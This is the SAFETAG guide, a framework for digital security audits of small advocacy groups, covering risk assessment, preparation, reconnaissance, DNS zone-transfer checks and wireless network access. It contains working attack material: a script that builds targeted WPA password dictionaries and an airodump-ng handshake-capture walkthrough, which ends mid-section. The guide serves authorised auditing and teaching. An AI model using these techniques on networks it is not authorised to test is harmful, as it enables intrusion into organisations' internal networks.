
A Security Auditing Framework and Evaluation Template for Advocacy Groups

Guide

License

SAFETAG resources are available under a Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) License

The audit framework and checklist may be used and shared for educational, non-commercial, not-for-profit purposes, with attribution to Internews. Users are free to modify and distribute content under conditions listed in the license.

The audit framework and checklist are intended as reference, and the authors take no responsibility for the safety and security of persons using them in a personal or professional capacity.

Attribution for content from other Licenses

Usage of "SAFETAG"

SAFETAG is itself a framework and template for organizational audits. As such, audits performed which use or adapt SAFETAG materials may be referred to as "adapting the SAFETAG methodology" or "based on the SAFETAG framework", and similar phrasings, but may NOT be called "SAFETAG audits".

This is not intended to imply that an audit using any or all of the SAFETAG materials needs to refer to SAFETAG at all.

This usage policy does not affect the distribution of SAFETAG materials, covered in the license statement above.

Introduction

The Security Auditing Framework and Evaluation Template for Advocacy Groups (SAFETAG) is a professional audit framework that adapts traditional penetration testing and risk assessment methodologies to be relevant to small, non-profit, human rights organizations based or operating in the developing world.

SAFETAG is based upon a set of principles, activities, and best practices to allow digital security auditors to best support at-risk organizations by working with them to identify the risks they face, the next steps they need to take to address them, and guidance on how to seek out support in the future.

SAFETAG audits are targeted at serving small-scale civil society organizations or independent media houses who have strong digital security concerns but cannot afford a traditional digital security audit. The traditional security-audit framework assumes that an organization has the time, money, and capacity to aim for security as close to perfect as possible. Low-income at-risk groups have none of these luxuries. Traditional audits are both far too expensive and produce output that is too complex for these organizations to act upon.

SAFETAG uses a customized combination of selected assessment activities derived from standards in the security auditing world and best practices for working with small-scale at-risk organizations to provide organization-driven risk assessment and mitigation consultation. SAFETAG auditors lead an organizational risk modeling process that helps staff and leadership take an institutional lens on their digital security problems; conduct a targeted digital security audit to expose vulnerabilities that impact the vital processes and assets identified; and provide post-audit reporting and follow-up that helps the organization and staff identify the training and technical support they need to address the needs identified in the audit, now and in the future.

[email protected] | https://safetag.org

The SAFETAG Audit Framework Core

The SAFETAG audit consists of multiple information-gathering and confirmation steps, as well as research and capacity-building exercises with staff, organized into a collection of objectives. Each objective supports the two core goals of SAFETAG: creating a risk assessment while also building the capacity of the organization.

Each objective collects approaches and activities for gathering and verifying information through both technical and interactive/social methods, for assessing and building capacity, and targeted exercises with walk-through instructions for many of these.

These are not meant to be a "checklist" or even a prescribed set of actions -- indeed, experienced auditors will deviate strongly from many of the specific activities. They provide a focused "minimal set" of activities only.

Indeed, many objectives and their specific exercises overlap or can be done together -- on-site interviews with staff can coincide with assessing their devices and keeping one's eyes open for physical security issues. The data assessment exercises may provide enough information that other staff engagements are unnecessary.

The Life Cycle of an Audit

SAFETAG Activities

The audit process is very cyclical. Newly identified threats, vulnerabilities, capabilities, and barriers affect activities that have already been run as well as those that have yet to be run. At the same time the auditor, through conversations, training, and group activities, is actively building the organization's agency and addressing time-sensitive or critical threats that can be dealt with within the time frame. This iterative process eventually leads to a point where the auditor is confident they have identified the critical issues and the low-hanging fruit, and that the organization is capable of moving forward with their recommendations.

Each objective requires a certain base of information, and outputs more information into this cyclical process. Each objective has a "map" of the data flow that it and its specific activities provide based on this map:

SAFETAG Data Flow

While more completely defined below in the Risk Assessment and Agency Building sections, a brief overview of the data flow components:

To make SAFETAG approachable, a core evaluation template is represented here. It links together a series of specific objectives, each with a variety of linked activities, that contribute towards the goals and their required information needs. Experienced auditors will likely come up with their own approaches, and the SAFETAG project welcomes such contributions.

Risk Assessment & Analysis

Functionally, SAFETAG is a digital risk assessment framework. Risk assessment is a systematic approach to identifying and assessing risks associated with hazards and human activities; SAFETAG focuses this approach on digital security risks. A SAFETAG audit works to collect the following types of information in order to assess the risks an organization faces.

Risk is the current assessment of the possibility of harmful events occurring. Risk is assessed by comparing the threats an actor faces with their vulnerabilities, and their capacity to respond to or mitigate emergent threats.

The SAFETAG evaluation revolves around collecting enough information to identify and assess the various risks that an organization and its related actors face, so that they can take action strategically.

The Risk Equation

Program Analysis

Program analysis identifies the priority objectives of the organization and determines its capacities. This process exposes the activities, actors, and capacities of an organization.

Activities

Definition: The practices and interactions that the organization carries out in order to accomplish their goals.

Example: This includes any activity that the organization carries out to accomplish its goals and those that allow the organization to function (publishing, payment, fund-raising, outreach, interviewing).

Actors

Definition: The staff, volunteers, partners, beneficiaries, donors, and adversaries associated with the organization.

Example: The core organizational staff; volunteers; maintenance, cleaning, security, or other non-critical staff; partner organizations; the individuals and groups that the organization provides services to; groups of unorganized individuals who are opposed to the organization's aims; and governmental and non-governmental high-power agents and organizations that are opposed to the organization's aims.

Vulnerability analysis

Understand the organization's exposure to threats, its points of weakness, and the ways in which the organization may be affected.

Vulnerability

Definition: An attribute or feature that makes an entity, asset, system, or network susceptible to a given threat.

Example: This can include poorly built or unmaintained hardware, software, or offices as well as missing, ignored, or poor policies or practices around security.

Threat Analysis

Threat analysis is the process of identifying possible attackers and gathering background information about their capability to threaten the organization. This information rests on a potential attacker's history of carrying out specific threats, their current capability to carry out those threats, and evidence that they intend to direct resources against the target.

Threat

Definition: A threat is a possible attack or occurrence that has the potential to harm life, information, operations, the environment, and/or property.

Example: Threats can range from fire or flood to targeted malware, physical harassment, or phishing attacks.

Threat History

Definition: What types of threats has the attacker used historically, and what types of actors have been targeted by those threats?

Example:

Threat Capability

Definition: The means that the attacker has to carry out threats against the organization.

Example: This includes, but is not limited to, technical skill, financial support, number of staff hours, and legal power.

Threat Intent

Definition: The level of desire for the attacker to carry out threats against the organization.

Example: Intent can be goals or outcomes that the adversary seeks; consequences the adversary seeks to avoid; and how strongly the adversary seeks to achieve those outcomes and/or avoid those consequences.

Agency Building

SAFETAG differs from many risk assessment tools because it aims to build the host's and staff's capacity so that they are able to address the risks that the auditor has identified. SAFETAG is designed to provide in-audit activities and training that increase an organization's agency to seek out and address security challenges within their organization. To do this an auditor must collect information that allows them to identify organizational areas of strength and weakness (expertise, finance, willingness to learn, staff time, etc.).

A common refrain, among auditors, software developers and other specialists in this sector, is that digital security is not about technology; it is about people. This is undeniably true, and even the previous SAFETAG modules — despite their more direct fixation on technology — acknowledge this insight by emphasizing the educational and persuasive roles played by your findings report.

Capacity

Definition: The combination of strengths, attributes and resources available within the organization that can be used to reduce the impact or likelihood of threats.

Example: This includes, but is not limited to, technical skill, financial support, staff and management time, relationships, and legal power.

Barriers

Definition: The combination of weaknesses, assumptions, regulations, social or cultural practices, and obligations that get in the way of an organization implementing an effective digital security practice.

Example: Examples can include a lack of funding, lack of authority within an organization to mandate practices to their staff, resistance to change, high staff turnover, or digital illiteracy.

Operational Security

"Also be aware that local groups may not be able to accurately gauge the safety of their communications with you. Sometimes they underestimate the likelihood of risk - at other times, they can wildly overestimate the risk. Either way, trainers need to navigate these issues carefully and respectfully with a "do no harm" approach that respects the reported needs, context, and experiences of your local contact and potential trainees." - Needs Assessment: Level-Up 1

Summary

Below are the baseline operational security guidelines for a SAFETAG audit. Activity specific operational security guidelines are contained within each activity.

Purpose

An audit uncovers an array of sensitive information about an organization. For some at-risk populations the mere act of getting a digital security audit can increase their likelihood of being actively attacked by an adversary. The foundation of the SAFETAG process is the goal of increasing the safety of the host organization, its staff, and the auditor. It is vital that an auditor weigh the possible risk an audit may incur for the organization or the auditor against the possible outcomes of an audit.

Objectives

SAFETAG Methods

Preparation

Summary

This component consists of trip preparation activities that are needed to ensure the technical and facilitated components of the audit are able to be conducted effectively and within the on-site time-frame and in coordination with the organization.

Purpose

A SAFETAG audit has a short time frame. Preparation is vital to ensure that time on the ground is not spent negotiating over the audit scope, updating the auditor's systems, searching for missing hardware, or refreshing oneself with the SAFETAG framework. To that end, negotiations with the host organization help reveal whether the organization has the capacity to undertake the audit and respond to its findings.

Guiding Questions

The Flow of Information

Preparation Information Flow

Approaches

Outputs

Operational Security

Resources

Facilitation Preparation

Password Dictionary Creation

Other Pre-Engagement Resources

Incident Handling Resources

Data Security Standards

Activities

Assessment Plan

Summary

This component allows an auditor and host to come to an understanding of the level of access that an auditor will have, what is off limits, and the process for modifying the scope of the audit when new information arises. This component consists of a process where the auditor collaboratively creates an assessment plan with key members of the organization.

A core tenet of SAFETAG is building agency in organizations to improve their digital security. To that end, collaboratively creating an assessment plan with the organization helps to clarify not only the audit scope - from discussing what sensitive data may be exposed to what systems may be disrupted in the process of the audit - but it also helps reveal the ability of the organization to support and respond to the audit findings.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a DRAFT combined engagement and confidentiality agreement.

Recommendation

Confidentiality Agreement

Summary

Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization and the outcomes of the audit.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a DRAFT Engagement and Confidentiality Agreement.

Recommendation

Incident Response and Emergency Contact

Summary

Establish a procedure for incident handling and an emergency contact in the event that the auditor causes or uncovers an incident during the course of the assessment.

Overview
Materials Needed
Considerations
Walkthrough

Travel Checklist

See the Appendix for a sample travel kit / checklist

Password Dictionary Creation

See the Appendix for creating a password dictionary.

Audit Timeline and Planning

Review these notes in preparation for the audit as you begin to map out your schedule. This provides a rough, suggested outline of how to schedule your time on site for a SAFETAG audit, and some reminders of the work you need to have completed before arriving in country.

Prepare for Uncertainty

The SAFETAG roadmap is a crisp, clear data flow of inputs to outputs. Reality, generally speaking, is less direct. There are a few core parts of the audit process that force action, but others are more flexible. Outcomes of your discussions and exploration of the network will also derail the process in impossible-to-predict ways. The pre-audit interviews and your own context research, research on the organization, and preparation are meant to give you the best possible idea of what situation you'll walk into, but even with all of that, frankly, shit happens.

Before Travel

First Day

Priorities for the first day include meeting staff (even, possibly especially, for the more technical auditor). There is a strong temptation to dive in and get started, but establishing connections with the staff - especially those you haven't met through interviews - is key. You may discover hidden sources of talent or resistance, historical information, and new parts of the infrastructure or practices and policies that you may not have yet found.

Early steps

From a data-gathering point of view, the first steps are to try and access the wireless network by password guessing, but also to connect to the network and capture traffic for analysis overnight. This provides other views on the actual technology and services used on the network, different both from the management and IT view as well as other tools discussed by staff.

First or Second day

Further Days (on Location)

The next day you're on location, you have hopefully looked through the research data you gathered and have some specific follow-up things to investigate. It's also now time to start going through the audit tasks.

Final Day (on Location)

Exploration and check-ins

Throughout the entire audit, aggressively make time to engage with staff - stop for coffee, eat lunch with them, have conversations. This can be integrated into other parts of the process, such as the user device assessments, as well as happening completely independently and naturally. Having better connections with staff will make the group exercises, especially the risk assessment work, flow much better.

Whenever you set off a scan (airodump, nmap, openvas...) is a good time to stand up and walk around.

Debrief and Setting Expectations

Largely covered in the [debrief section], making time at the end of the (often hectic) audit week is very important to making sure the next few steps are absolutely clear in terms of timelines and communication protocols.

Clean up

If you have been using paper or post-it notes during the audit, be sure you securely destroy them (by shredding, burning, or tearing into small pieces) before you leave the site on the last day. By the same token, any digital reports should be stored on secure media and securely deleted from all other locations. See the operational security section and per-item notes for further details. Clean off any whiteboards used, and check any camera used to remove sensitive photos.

Follow up care and Reporting

See the reporting sections for specific details here, but a series of check-ins with the organization to support their ability to respond to any incidents, understand further topics from the debrief, and to help provide them a timeline to expect the final report is valuable in maintaining their engagement post-audit to support the needed changes.

Context Research

Summary

This component allows the auditor to identify the relevant regional and technological context needed to provide a safe and informed SAFETAG audit. This component consists of desk research that is collected and analyzed by the auditor, as well as inputs from the Interview component.

Purpose

Analysis of context is the foundation of effective risk management. Both at-risk organizations and auditors will develop assumptions based upon their experience. It is important that an audit is based on information that is current and accurate.

Checking the assumptions both of the organization and of the auditor by researching the current regional and technological context will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations.

The Flow of Information

Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Other Context Analysis Methodologies

Threats to the Auditor

Have aid workers faced retribution for their work in the region?

Is it safe to do digital security work in the region?

Is the area safe to travel to?

Targeted Threats for the organization

Is the group facing any legal threats because of its work?

Does the organization face any targeted threats because of their work?

General Threats for the organization

What general non-governmental threats does the organization face?

What cyber-security practices is the government using?

What general cyber-security threats is the organization facing?

What level of technology is available in the region?

Activities

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

Regional Context Research

Summary

This exercise focuses on research and re-confirmation of regional issues from general trends to specific legal restrictions and safety concerns, as well as current news and persistent challenges.

Overview
Materials Needed
Considerations
Walkthrough

Cross-check reports on regional threats facing organizations with their focus area.

Identify any legal risks associated with conducting the audit: secure communications and storage, network forensics, device exploitation, and digital security training may each be restricted or criminalized in the region.

Identify any infrastructural barriers to adopting digital security practices.

Explore the security landscape of hardware and software identified in interviews by conducting a basic vulnerability analysis.

Technical Context Research

Summary
Overview
Materials Needed
Considerations
Walkthrough

Capacity Assessment

Summary

In this component the auditor engages with staff through interviews and conversations to identify the organization's strengths and weaknesses (expertise, finance, willingness to learn, staff time, etc.) in adopting new digital and physical security practices. The auditor uses this information to modify the audit scope and recommendations accordingly.

Purpose

Knowing an organization's strengths and weaknesses allows the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. The auditor will use this assessment in preparing for the audit itself as well as when evaluating the difficulty of a recommendation. This information also provides a starting place for understanding the organization's current use and understanding of technology, digital security, and current threat landscape, as well as revealing elements of an organization's workflow, infrastructure and even vulnerabilities that you might otherwise have overlooked.

The Flow Of Information

Audit Preparation Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Background Interview Approaches

Activities

Interviews

Summary

The auditor conducts interviews with various staff members to gather information on the organization's risks and capacity.

Q&A sessions are unabashedly white box aspects of a security assessment, and you will occasionally hear push-back along the lines of, "You wouldn't have found that thing if we hadn't told you about this other thing." Compelling black box findings certainly do have an advantage when it comes to persuasiveness, but obtaining them can be quite time-consuming, so relying exclusively on vulnerabilities that you can identify without "help" is generally a mistake in this resource-constrained sector.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a sample set of interview questions

Capacity Assessment Checklist

Summary

A monolithic, one-time interview with key staff is not always possible or advisable, but interacting with a variety of staff exposes valuable information about every aspect of the audit, from vulnerabilities to capacity to hidden barriers. This serves as a "cheat sheet" of some topics to explore both during the planning and preparation phase and throughout the audit process.

Walkthrough

"Homework"

Organizational

Contextual / Background / Threat information

Technical:

Preparation Support

Reconnaissance

Summary

The remote assessment methodology focuses on direct observation of an organization and their infrastructure, consisting of passive reconnaissance of publicly available data sources ("Open Source Intelligence"). This allows the auditor to identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Purpose

While much of SAFETAG focuses on digital security challenges within and around the office, unintended information available from "open sources" can pose real threats and deserve significant attention. This also builds the Auditor's understanding of the organization's digital presence and will guide specific vulnerabilities to investigate once on site.

The Flow Of Information

Reconnaissance Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Open Source Intelligence (General)

Organizational Information Gathering

Searching

Pastebin Searching

Recon-ng

Activities

Manual Reconnaissance

Summary

This exercise suggests some targeted online search tools and tricks to gather information leakages from organizations. While many advocacy, activism, and media/journalism focused organizations are very public as part of their operations, the searches suggested here aim to explore data that could be used to better attack or socially engineer an organization.

Overview
Materials Needed
Considerations
Walkthrough

These custom and more manual approaches work excellently in combination with automated tools such as recon-ng or the commercial Maltego. Working with both these tricks and the automated tools, feeding information learned from one back to the other, is a powerful way to unearth large amounts of information about an organization.

Many of the tools and much further guidance are well covered in the references for the Reconnaissance method; a small selection of starting points is mapped out below.

Take care, however, not to waste time on this; running image-metadata tools on every photo on an organization's website, or researching every linked social media account, may not yield further valuable information. Step back and judge the value of digging deeper: are you finding adversaries? Are you finding information that the organization may not want online? Are there other methods which might be more appropriate to apply?

Search Engines

Google dorking tricks:

Social Media / Account Discovery
Additional Tools
Pastebin Searching
Working with Images
Recommendation

Automated Reconnaissance

Summary

This component allows the auditor to quickly identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a full walk-through of using recon-ng

Recommendation
Summary

MX, or Mail Exchange, records are required to be public for any domain you wish to receive email through. These records can still reveal sensitive information about your hosting set-up.

MX Records can reveal vulnerable mail servers or information about other services hosted internally.

Overview
Materials Needed
Considerations
Walkthrough

MX Record research reveals a self-hosted email server at SampleOrg's offices:

mail.sample.org has address 192.0.2.3

Determine the mail exchanger(s) for the organization's primary domain:

$ host -t mx sample.org
sample.org mail is handled by 21 mail.sample.org.

(21 is the MX preference; where several records exist, the lowest value is tried first.) If the MX points at a third-party provider's hostname rather than a host under the organization's own domain, mail is outsourced and this record says little about the office network.

Determine the IP address of the mail server:

$ host mail.sample.org
mail.sample.org has address 192.0.2.3

If this address falls inside the range the organization's office connection uses, mail is being hosted on-site.

Recommendation

No fix needed

Unless other assessments reveal specific vulnerabilities in the e-mail services used, there is no action to take. Unless you have sufficient in-house expertise, it is often recommended not to host your own email server. While self-hosted email provides more control and potentially more security, managing the security of the server is a complex job. Hosted mail-filtering services that sit in front of your server (MailControl and Postini were two examples; offerings change, so check what is currently available) can also provide some level of protection by acting as a first-pass check for spam and viruses, and by (slightly) reducing the visibility of your organizational mail server.

Anonymous DNS Zone Transfer

Summary

Anonymous individuals online can request the full list of the hostnames on the organization's domain. Responding to zone requests from anyone on the Internet is comparable to providing an inventory of office locations, pending projects and service providers to anyone who asks. As such, it is not inherently dangerous, but it does require that the organization not rely on the assumption that unpublicized URLs are in fact secret.

An overly permissive domain name service (DNS) provider allows an attacker to enumerate online services that the organization might think are “hidden” because they have not been (intentionally) published. A zone transfer returns all of the hostnames at a particular domain, or “zone.” So, a request for sample.org may return www.sample.org, webmail.sample.org and ftp.sample.org, along with other less obviously guessable targets, such as wordpress-testing.sample.org.

While any user should be able to use a name server to look up a hostname and convert it to the corresponding IP address, most well-administered name servers allow full “zone transfer” requests only from a specific list of authorized locations (often themselves subsidiary name servers).

Overview
Materials Needed
Considerations
Walkthrough

Determine the authoritative name server(s) for the organization’s primary domain:

$ host -t ns sample.org
sample.org name server ns1.something.net.
sample.org name server ns2.something.net.

Attempt a zone transfer on that domain, using that name server:

$ host -l sample.org ns1.something.net
Using domain server:
Name: ns1.something.net
Address: 192.0.2.1#53
Aliases:

www.sample.org has address 192.0.2.2
mail.sample.org has address 192.0.2.3
webmail.sample.org has address 192.0.2.4
ftp.sample.org has address 192.0.2.5
foo.sample.org has address 192.0.2.6
bar.sample.org has address 192.0.2.7

Repeat the request against each authoritative name server (ns2.something.net here as well): transfer policy is configured per server, and a secondary is sometimes left open when the primary has been locked down. A correctly restricted server refuses the request, and host prints "; Transfer failed." instead of listing records. The equivalent check with dig is "dig axfr sample.org @ns1.something.net".

Recommendation

Eliminate or limit zone transfer permissions

The DNS provider for sample.org allows anonymous DNS zone transfers, revealing subdomain information

An anonymous zone transfer request revealed the following subdomains:

www.sample.org has address 192.0.2.2
mail.sample.org has address 192.0.2.3
webmail.sample.org has address 192.0.2.4
ftp.sample.org has address 192.0.2.5
foo.sample.org has address 192.0.2.6

In most cases, the DNS zone transfer policy is set by your DNS provider, and most providers limit anonymous zone transfers by default. If yours does not, you will need to work with their support team to restrict transfers, or switch to a different DNS provider. Bear in mind that closing zone transfers removes one enumeration path only: hostnames can still be discovered through certificate transparency logs, search engines, and plain guessing, so an unpublicized hostname should never be treated as a secret.

If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.
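The two walkthroughs above (the MX lookup and the zone transfer) come down to reading `host` output and deciding what it means for the report. The following is an added example, not code from the SAFETAG guide, that does that reading programmatically. The sample `host` output is constructed from the walkthroughs with RFC 5737 documentation addresses (192.0.2.0/24) in place of real ones, and the office network prefix and the set of hostnames the organization already publishes are hypothetical inputs you would collect during interviews. The `live_check` function wraps the BIND `host` command for use on a real engagement and is the only part that needs network access.

```python
# Added example, not part of the SAFETAG guide: parse raw `host` output from the
# MX-record and zone-transfer walkthroughs and turn it into report findings.
# Assumptions (not from the page): sample output is constructed using RFC 5737
# documentation addresses (192.0.2.0/24); the office prefix and the set of
# already-published hostnames are hypothetical inputs gathered in interviews.
import ipaddress
import re
import subprocess

# Constructed `host -t mx sample.org` output (21 is the MX preference).
SAMPLE_MX = "sample.org mail is handled by 21 mail.sample.org.\n"
# Constructed `host mail.sample.org` output.
SAMPLE_MAIL_A = "mail.sample.org has address 192.0.2.3\n"

# Constructed `host -l sample.org ns1.something.net` output from a server that permits anonymous AXFR.
SAMPLE_AXFR = """Using domain server:
Name: ns1.something.net
Address: 192.0.2.1#53
Aliases:

www.sample.org has address 192.0.2.2
mail.sample.org has address 192.0.2.3
webmail.sample.org has address 192.0.2.4
ftp.sample.org has address 192.0.2.5
wordpress-testing.sample.org has address 192.0.2.6
"""

# Constructed output from a correctly restricted server; host prints this marker when AXFR is refused.
REFUSED_AXFR = "Using domain server:\nName: ns2.something.net\nAddress: 192.0.2.53#53\nAliases:\n\n; Transfer failed.\n"

MX_RE = re.compile(r"^(\S+?)\.? mail is handled by (\d+) (\S+?)\.?$", re.M)
A_RE = re.compile(r"^(\S+?)\.? has (?:IPv6 )?address (\S+)$", re.M)
NS_RE = re.compile(r"^\S+ name server (\S+?)\.?$", re.M)


def parse_mx(text):
    """Return [(preference, mail_host), ...] with the preferred (lowest) MX first."""
    return sorted((int(pref), host) for _dom, pref, host in MX_RE.findall(text))


def parse_a_records(text):
    """Return {hostname: [address, ...]} for every 'X has address Y' line."""
    records = {}
    for name, addr in A_RE.findall(text):
        records.setdefault(name, []).append(addr)
    return records


def parse_axfr(text):
    """Return the zone as {hostname: [addresses]}, or None when the transfer was refused."""
    if "; Transfer failed." in text:
        return None
    return parse_a_records(text) or None


def assess(domain, mx, mail_records, zone, known_hosts, office_net):
    """Derive the findings the two walkthroughs are after: mail hosted inside the
    office network, whether AXFR is open, and which exposed names were never published."""
    net = ipaddress.ip_network(office_net)
    findings = []
    for _pref, host in mx:
        for addr in mail_records.get(host, []):
            if ipaddress.ip_address(addr) in net:
                findings.append("self-hosted mail: %s (%s) is inside %s" % (host, addr, office_net))
    if zone is None:
        findings.append("zone transfer refused: no hostnames exposed")
        return findings
    findings.append("zone transfer permitted: %d hostnames exposed" % len(zone))
    for name in sorted(zone):
        if name != domain and name not in known_hosts:
            findings.append("unpublicized host: %s -> %s" % (name, ", ".join(zone[name])))
    return findings


def run_host(*args):
    """Run the BIND `host` utility and return its stdout (live checks only; needs network)."""
    return subprocess.run(["host", *args], capture_output=True, text=True).stdout


def live_check(domain, known_hosts, office_net):
    """Run both walkthroughs live against every authoritative server: zone-transfer
    policy is per server, and a secondary is often left open when the primary is not."""
    mx = parse_mx(run_host("-t", "mx", domain))
    mail_records = {}
    for _pref, host in mx:
        mail_records.update(parse_a_records(run_host(host)))
    findings = []
    for ns in NS_RE.findall(run_host("-t", "ns", domain)):
        zone = parse_axfr(run_host("-l", domain, ns))
        findings += ["[%s] %s" % (ns, f) for f in assess(domain, mx, mail_records, zone, known_hosts, office_net)]
    return findings


if __name__ == "__main__":
    published = {"www.sample.org", "mail.sample.org", "webmail.sample.org"}  # hypothetical interview output
    for line in assess("sample.org", parse_mx(SAMPLE_MX), parse_a_records(SAMPLE_MAIL_A),
                       parse_axfr(SAMPLE_AXFR), published, "192.0.2.0/28"):
        print(line)
```

The offline functions carry the three judgements the walkthroughs ask you to make: a refused transfer is recognised by host's "; Transfer failed." marker rather than by an empty record list, mail is flagged as self-hosted only when the MX address falls inside the office range you were given, and every authoritative server is tried separately because transfer policy is configured per server.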

Network Access

Summary

This component allows the auditor to test the strength of defenses the host has in place to protect their local area network. This component consists of gaining access to the local area network through a wireless access point and unsecured physical channels (such as an ethernet jack).

Purpose

By walking organizations through the vulnerabilities of wireless networks, you have the opportunity to discuss password strength, and the power that having "offline" access to a password means in terms of brute forcing it, as well as the importance of defense in depth even within their trusted work network - reducing the services computers and servers are sharing, setting up local firewalls on computers, and requiring authentication to access files.

Even a few minutes of passive network "sniffing" can capture the encrypted handshake a client performs when it joins a WPA-protected network; an adversary can then walk away with that capture and guess the password offline, at leisure. Knowing this password lets someone join the internal network, read files shared internally, and even change network settings to enable remote access. In an ideal setup this would give no further access to sensitive documents, but it is not uncommon to find open shared folders, or to gain access to the firewall or network routers (often left on the default password because they're "only accessible from inside the network...").

The Flow of Information

Information Flow

Guiding Questions

Approach

Note: If you don't manage to crack the password, it's not worth spending precious audit time brute forcing it: simply ask for the password and move on. If it's a WPA network, you can keep cracking after hours, if only to demonstrate how long their current password would "protect" them against a dedicated attacker.

Outputs

Operational Security

Note: This section is one of the few sections where the SAFETAG audit does go through attack scenarios, from attempting to "break in" to the wireless network to testing exposed ethernet jacks for connectivity.

The reasons for this are threefold. First, access to an organization's internal network tends to reveal sensitive data and "shadow" infrastructure (such as Dropbox usage), which leads to many recommendations to improve access control and to discussions of the value of defense in depth. Second, the specific act of breaking the WiFi password allows for a discussion on password security without attacking any specific user's password. Finally, with wireless networks treated as equivalent to wired networks in many offices, reminding the organization that wireless networks extend beyond the physical walls of the office is useful in discussing password rotation and guest network policies.

Once you have access to the network, you need to first document how you managed that and share it with the hosts. This is a great moment to discuss passwords in many cases.

Preparation

Baseline Skills

Resources

Wireless Access Guides & Resources

Activities

WPA Password Cracking

Summary

The organization’s wireless Local Area Network (WLAN) protects the network and its users with WPA encryption. This is an important security measure, and a WPA-protected wireless network is much safer than an unencrypted “open” network or a WEP-protected network. (WEP is fundamentally flawed, and extremely simple attacks have been widely known for over a decade.) However, the ease with which an attacker could guess the WPA key, or “WiFi password,” is a serious issue, particularly considering its importance as an essential perimeter control. An attacker who gains access to the wireless LAN immediately bypasses many protections that network administrators, and other users of the office network, often take for granted. Put another way, anyone able to guess the WPA key is immediately “inside the firewall.”

Using a laptop and a wireless card with a standard, internal antenna (or using a customized smartphone or other small device), an attacker could easily position themselves close enough to the office to carry out the first phase of this attack, which would only take a few minutes. The second phase, which is supposed to be the difficult part, could take even less time. From the privacy of their own home or office, the attacker could use a minimally customized password dictionary to guess the WPA key.

Overview
Materials Needed
Considerations
Walkthrough

An attacker can crack the office’s WPA key in approximately with a short and minimally customized password dictionary based on open information about the organization and basic word collections.

Step 1: The attacker customizes their WiFi password dictionary, adding phrases related to the subject: organization name, street address, phone number, email domain, wireless network name, etc. Common password fragments are included as well: qwerty, 12345, asdf and all four-digit years back to 2001, for example, among others. They may then add hundreds or thousands of words (in English and/or other relevant languages).

See the Dictionary Creation example under Preparation for details on password dictionary building.
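As an added example, not part of the SAFETAG guide or its Preparation materials, the script below builds exactly this kind of targeted list: every spelling variant of each organization-specific seed, combined with common fragments and four-digit years as prefix and suffix, filtered to the 8 to 63 characters a WPA passphrase may have. The seeds are constructed placeholders for the fictional sample.org; the 2,000 keys per second figure used for the time estimate is the rate the guide's own laptop reports further below.

```python
"""Build a targeted WPA candidate list from organization-specific seeds.

Added example, not part of the SAFETAG guide. The seed words below are
constructed placeholders for the fictional sample.org; in a real audit they
come from the open-source research done in the Preparation phase
(organization name, street address, phone number, email domain, SSID, ...).
"""
import itertools

# WPA/WPA2 passphrases are 8 to 63 printable ASCII characters.
MIN_LEN, MAX_LEN = 8, 63

# Constructed seeds for the fictional sample.org.
SEEDS = ["sample", "Sample Org", "sampleorg", "123 Main Street", "555-0100",
         "sample.org", "sampleorg-wifi"]
# Fragments people bolt onto a word to "make it a password".
FRAGMENTS = ["", "1", "12", "123", "1234", "12345", "!", "qwerty", "asdf"]


def years(first=2001, last=2012):
    """Four-digit years used as suffixes/prefixes. The guide's capture dates
    from 2012; extend `last` to the current year in a real audit."""
    return [str(y) for y in range(first, last + 1)]


def case_variants(word):
    """Spelling variants of one seed: spaces removed, punctuation optionally
    removed, then the casings people actually type."""
    compact = word.replace(" ", "")
    alnum_only = "".join(ch for ch in compact if ch.isalnum())
    variants = set()
    for base in (compact, alnum_only):
        variants.update({base, base.lower(), base.upper(), base.capitalize()})
    return {v for v in variants if v}


def build_wordlist(seeds=SEEDS, fragments=FRAGMENTS, year_list=None):
    """Combine every seed variant with every fragment and year, as suffix and
    as prefix, keeping only WPA-legal lengths. Returns a sorted, de-duplicated
    list ready for `aircrack-ng -w`."""
    if year_list is None:
        year_list = years()
    candidates = set()
    for seed in seeds:
        for base in case_variants(seed):
            for extra in itertools.chain(fragments, year_list):
                for cand in (base + extra, extra + base):
                    if MIN_LEN <= len(cand) <= MAX_LEN:
                        candidates.add(cand)
    return sorted(candidates)


def seconds_to_exhaust(n_candidates, keys_per_second=2000):
    """Worst-case time for aircrack-ng to try the whole list at the rate the
    guide's laptop achieved (about 2,000 keys per second)."""
    return n_candidates / keys_per_second


if __name__ == "__main__":
    words = build_wordlist()
    with open("sampleorg_dictionary.txt", "w") as fh:
        fh.write("\n".join(words) + "\n")
    print(f"{len(words)} candidates, exhausted in "
          f"{seconds_to_exhaust(len(words)):.0f} s at 2,000 keys/s")
```

The output file is a plain one-candidate-per-line list, which is what aircrack-ng's -w option and John's --wordlist expect. Because every combination is tried both ways round and in several casings, a handful of seeds already produces thousands of candidates; the time estimate printed at the end is a useful number for the report, since it shows how cheap a targeted dictionary attack is compared with the brute-force figures discussed under Results.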

Step 2: The attacker would then begin recording all (encrypted) wireless traffic associated with the organization’s access point:

$ sudo airodump-ng -c 1 --bssid 1A:2B:3C:4D:5E:6F -w sampleorg_airodump mon0

 CH  1 ][ Elapsed: 12 mins ][ 2012-01-23 12:34 ][ fixed channel mon0: -1
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 1A:2B:3C:4D:5E:6F  -70 100    12345    43210    6   1  12e. WPA2 CCMP   PSK sampleorg
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 1A:2B:3C:4D:5E:6F  01:23:45:67:89:01    0    0e- 0e   186    12345
 1A:2B:3C:4D:5E:6F  AB:CD:EF:AB:CD:EF    0    1e- 1      0     1234
